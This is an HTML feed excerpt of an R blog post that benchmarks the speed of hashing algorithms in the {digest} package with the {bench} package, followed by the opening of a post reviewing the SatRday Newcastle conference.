&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(tools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;package_dependencies&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;digest&amp;#34;&lt;/span&gt;, reverse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;digest)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 186&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The number of available hashing algorithms has grown over the years, and as a little side project, we decided to test the speed of the various algorithms. To be clear, I’m not considering any security aspects or the potential of hash clashes, just pure speed.&lt;/p&gt;
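&lt;p&gt;To give a flavour of what is being compared, here is a minimal sketch that hashes the same value with several algorithms. The vector &lt;code&gt;algos&lt;/code&gt; and its four entries are our own illustrative selection, not the full set that {digest} supports.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;library(&amp;#34;digest&amp;#34;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# A small, illustrative subset of the algorithms accepted by digest()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;algos = c(&amp;#34;md5&amp;#34;, &amp;#34;sha1&amp;#34;, &amp;#34;crc32&amp;#34;, &amp;#34;sha256&amp;#34;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Hash the same object once per algorithm; the result is named by algorithm
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;hashes = vapply(algos, function(a) digest(1234, algo = a), character(1))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;hashes
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Each algorithm returns a hexadecimal string of a different length, which hints at why their running times may differ.&lt;/p&gt;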
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-digest-timings-bench-package"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="timing-in-r"&gt;Timing in R&lt;/h3&gt;
&lt;p&gt;There are numerous ways of &lt;a href="https://www.jumpingrivers.com/blog/timing-in-r/"&gt;timing R&lt;/a&gt; functions. A recent addition to this list is the &lt;a href="https://cran.r-project.org/web/packages/bench/" rel="external"&gt;{bench}&lt;/a&gt; package. The main function &lt;a href="https://github.com/r-lib/bench#features" rel="external"&gt;bench::mark()&lt;/a&gt; has a number of useful features over other timing functions.&lt;/p&gt;
&lt;p&gt;To time and compare two functions, we load the relevant packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;bench&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;digest&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;then we call the &lt;code&gt;mark()&lt;/code&gt; function and compare the &lt;code&gt;md5&lt;/code&gt; with the &lt;code&gt;sha1&lt;/code&gt; hash&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1234&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mark&lt;/span&gt;(check &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; md5 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;md5&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sha1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sha1&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(expression, median)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 2 x 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## expression median&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;bch:expr&amp;gt; &amp;lt;bch:tm&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 md5 50.2µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 sha1 50.9µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The resulting &lt;code&gt;tibble&lt;/code&gt; object contains all the timing information. For simplicity, we&amp;rsquo;ve just selected the expression and median time.&lt;/p&gt;
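&lt;p&gt;A note on the &lt;code&gt;check = FALSE&lt;/code&gt; argument used above: by default, &lt;code&gt;mark()&lt;/code&gt; verifies that every expression returns an equal result, which cannot hold when comparing different hashing algorithms. The sketch below, with the illustrative name &lt;code&gt;default_check&lt;/code&gt;, shows what should happen if the argument is left at its default.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;library("bench")
library("digest")

value = 1234
# md5 and sha1 return different hashes, so the default
# check = TRUE is expected to stop with an error
default_check = try(
  mark(
    md5 = digest(value, algo = "md5"),
    sha1 = digest(value, algo = "sha1")
  ),
  silent = TRUE
)
# TRUE if mark() refused to compare the two expressions
inherits(default_check, "try-error")
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When the expressions are meant to return the same value, keeping the default check is a useful safeguard against timing two functions that do different things.&lt;/p&gt;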
&lt;h3 id="more-advanced-bench"&gt;More advanced {bench}&lt;/h3&gt;
&lt;p&gt;Of course, it’s more likely that you’ll want to compare more than two things. You can compare as many function calls as you want with &lt;code&gt;mark()&lt;/code&gt;, as we’ll demonstrate in the following example. You’ll probably also want to compare these function calls against more than one value. For example, the {digest} package provides eight different algorithms, ranging from the standard &lt;code&gt;md5&lt;/code&gt; to the newer &lt;code&gt;xxhash64&lt;/code&gt; methods. To compare times, we’ll generate &lt;code&gt;n = 20&lt;/code&gt; random character strings of length &lt;code&gt;N = 10,000&lt;/code&gt;. This can all be wrapped up in a single &lt;code&gt;press()&lt;/code&gt; function call from the {bench} package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;N &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1e4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;results &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;suppressMessages&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bench&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;press&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;replicate&lt;/span&gt;(n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;LETTERS&lt;/span&gt;, N, replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;), collapse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bench&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mark&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; iterations &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, check &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; md5 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;md5&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sha1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sha1&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; crc32 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;crc32&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sha256 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sha256&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sha512 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sha512&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xxhash32 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;xxhash32&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xxhash64 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;xxhash64&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; murmur32 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;murmur32&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The tibble &lt;code&gt;results&lt;/code&gt; contains the timing results. But it’s easier to work with relative timings, so we’ll rescale&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rel_timings &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; results &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(expression, median) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(expression &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;names&lt;/span&gt;(expression)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;distinct&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(median_rel &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unclass&lt;/span&gt;(median&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;min&lt;/span&gt;(median)))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then plot the results, ordered from fastest to slowest&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(rel_timings) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_boxplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fct_reorder&lt;/span&gt;(expression, median_rel), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; median_rel)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ylab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Relative timings&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlab&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;N = 10,000&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_flip&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="digest-1.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;The &lt;code&gt;sha256&lt;/code&gt; algorithm is about three times slower than the &lt;code&gt;xxhash32&lt;/code&gt; method. However, it’s worth bearing in mind that although it’s relatively slower, the absolute times are very small&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rel_timings &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(expression) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(median &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;median&lt;/span&gt;(median)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(median))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 8 x 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## expression median&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;bch:tm&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 sha256 171.2µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 sha1 112.6µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 md5 109.5µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 sha512 108.4µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 crc32 91µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 xxhash64 85.1µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 murmur32 82.1µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 xxhash32 77.6µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It’s also worth seeing how the results vary according to the size of the character string &lt;code&gt;N&lt;/code&gt;.&lt;/p&gt;
&lt;img class="image-center" src="digest-2.png" style="width:550px; class:image-center"&gt;
&lt;p&gt;Regardless of the value of &lt;code&gt;N&lt;/code&gt;, the &lt;code&gt;sha256&lt;/code&gt; algorithm is consistently the slowest.&lt;/p&gt;
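&lt;p&gt;The code behind the figure above isn&amp;rsquo;t shown, but a comparison across string sizes could be sketched along the following lines. This is a minimal sketch, not the code used for the plot: the helper &lt;code&gt;random_string()&lt;/code&gt;, the object &lt;code&gt;results_by_n&lt;/code&gt;, the three values of &lt;code&gt;N&lt;/code&gt; and the choice of three algorithms are all assumptions made for illustration.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;library("bench")
library("digest")

# Hypothetical helper: a random upper-case string of length N
random_string = function(N) {
  paste0(sample(LETTERS, N, replace = TRUE), collapse = "")
}

# press() runs the block once for each value of N
results_by_n = bench::press(
  N = c(10, 1000, 100000),
  {
    value = random_string(N)
    bench::mark(
      check = FALSE,
      md5 = digest(value, algo = "md5"),
      sha256 = digest(value, algo = "sha256"),
      xxhash32 = digest(value, algo = "xxhash32")
    )
  }
)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The result has one row per combination of &lt;code&gt;N&lt;/code&gt; and expression, with &lt;code&gt;N&lt;/code&gt; stored as a column, so it can be rescaled and plotted in the same way as before.&lt;/p&gt;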
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;R is going the way of “tidy” data. Though it wasn&amp;rsquo;t the focus of this blog post, I think that the {bench} package is as good as other timing packages out there. Not only that, but it fits in with the whole “tidy” data thing. Two birds, one stone.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/digest-timings-bench-package/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Thoughts on SatRday Newcastle</title><link>https://www.jumpingrivers.com/blog/satrday-ncl-review/</link><pubDate>Wed, 15 May 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrday-ncl-review/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrday-ncl-review/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrday-ncl-review/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Earlier this month I attended the inaugural Sat&lt;strong&gt;R&lt;/strong&gt;day Newcastle. This was my first time attending a Sat&lt;strong&gt;R&lt;/strong&gt;day event, and I had a really enjoyable day. The event was sponsored by &lt;a href="https://www.ncl.ac.uk/" rel="external"&gt;Newcastle University&lt;/a&gt;, &lt;a href="https://www.sage.com/" rel="external"&gt;Sage&lt;/a&gt;, &lt;a href="https://www.rstudio.com/" rel="external"&gt;RStudio&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;. There were over 100 attendees from across the U.K. Most attendees were from industry, although there were also a couple of academics present. There were also lots of R-Ladies, including women from the newly formed &lt;a href="https://www.meetup.com/rladies-newcastle/" rel="external"&gt;R-Ladies Newcastle&lt;/a&gt;, who are launching next month. There was even a four-month-old baby - well, you’ve got to start them young!&lt;/p&gt;
&lt;img class="image-center" src="r-ladies-satrday-cropped.jpg" style="width:500px; class:image-center"&gt;
&lt;p&gt;There were lots of interesting talks during the day, but here are a couple of my personal favourites.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-satrday-ncl-review"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h4 id="noa-tamir-data-culture-in-practice"&gt;&lt;a href="http://www.noatamir.com/" rel="external"&gt;Noa Tamir&lt;/a&gt;: Data Culture in Practice.&lt;/h4&gt;
